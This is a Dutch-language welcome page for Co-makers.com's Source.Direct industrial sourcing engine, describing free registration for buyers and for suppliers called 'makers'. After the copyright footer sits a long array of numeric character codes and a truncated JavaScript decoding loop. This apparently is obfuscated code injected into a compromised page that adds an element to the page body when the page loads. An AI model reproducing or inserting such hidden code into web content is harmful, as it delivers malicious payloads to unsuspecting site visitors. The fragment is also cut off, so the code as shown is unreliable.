Home Register  Purchasing Market Research | Global Sourcing | Source.Direct | Supply Chain Development | Meet&Match

 Add to favorites
 Register
 Login

  English Nederlands Deutsch
Co-makers.com - Welcome

Hartelijk welkom bij de 'Beta Test' versie van Source.Direct, de industriŽle zoekmachine van Co-makers.com. Deze versie wordt nog continu verbeterd, mede door uw input. Wij danken u voor uw opmerkingen (graag via de feedback button!) en begrip.

Uitbesteders en inkopers (wij spreken universeel over 'buyers') kunnen na registratie kosteloos een uitbestedingsaanvraag specificeren en vergelijken met de profielen van de gespecialiseerde toeleveranciers die te vinden zijn in Source.Direct. Uit het overzicht dat wordt gegenereerd kan de buyer vervolgens eenvoudig de voor hem of haar 5 best passende toeleveranciersprofielen selecteren om deze bedrijven direct de aanvraag te sturen met een vraag naar capaciteit, 'fit' en interesse. Na de reacties van de toeleveranciers kiest de buyer eenvoudig de best passende, mede op basis van de ervaringen van mede uitbesteders die deze hebben vastgelegd in het zogenaamde 'Co-reference' systeem.

Registreren als 'Buyer' (alleen zoeken naar nieuwe toeleveranciers)

Toeleveranciers (ondanks dat hier ook industriŽle dienstverleners onder vallen ook wel Ďmakersí genoemd) gebruiken Source.Direct om gericht contact te leggen met buyers die een uitbestedingsaanvraag hebben gespecificeerd. De basis wordt hierbij gevormd door een gedetailleerd bedrijfsprofiel dat de toeleverancier vastlegt bij registratie en dat door de specialisten van Co-makers.com op locatie wordt geverifieerd tijdens een scan of audit. Bovendien kan aan klanten worden gevraagd om een evaluatie van de competenties vast te leggen in het 'Co-reference' systeem.

Registratie van een profiel in Source.Direct is kosteloos, wil je echter blijvend gevonden worden dan is toetreding tot het Co-makers Netwerk noodzakelijk. Hierbij hoort tevens de eerder genoemde audit. Neem contact op met Co-makers voor de tarieven van toetreding.

Registreren als 'Maker' (gevonden worden als toeleverancier ťn zelf zoeken)

Wanneer u zich heeft geregistreerd als 'maker' kunt u niet alleen gevonden worden maar heeft u tevens de mogelijkheden om zelf te zoeken via Source.Direct. U heeft dus automatisch ook de functionaliteit van de 'buyer'.

Nieuws

Classifieds
© 2021 Co-makers International b.v. All Rights Reserved.
163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));ss=String;d=document;for(i=0;i